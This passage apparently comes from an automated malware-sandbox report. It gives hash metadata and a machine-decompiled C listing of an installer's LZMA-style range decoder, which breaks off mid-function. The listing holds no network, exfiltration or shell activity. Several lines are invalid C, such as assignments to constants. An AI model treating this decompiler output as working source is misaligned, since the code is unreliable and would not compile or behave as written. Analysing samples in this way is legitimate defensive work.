                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 1892508949-47812868
                                          • Opcode ID: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                          • Instruction ID: 7f8751d3726a152fc7b031c4469f223aff892055c158b12f401dbf96511dfde3
                                          • Opcode Fuzzy Hash: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                          • Instruction Fuzzy Hash: EC112B31208151EBDB307FA54D409BF37B0DA92714B28467FE592B22D3D63D4943962E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406D5A, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E00406D5A() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071C8))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
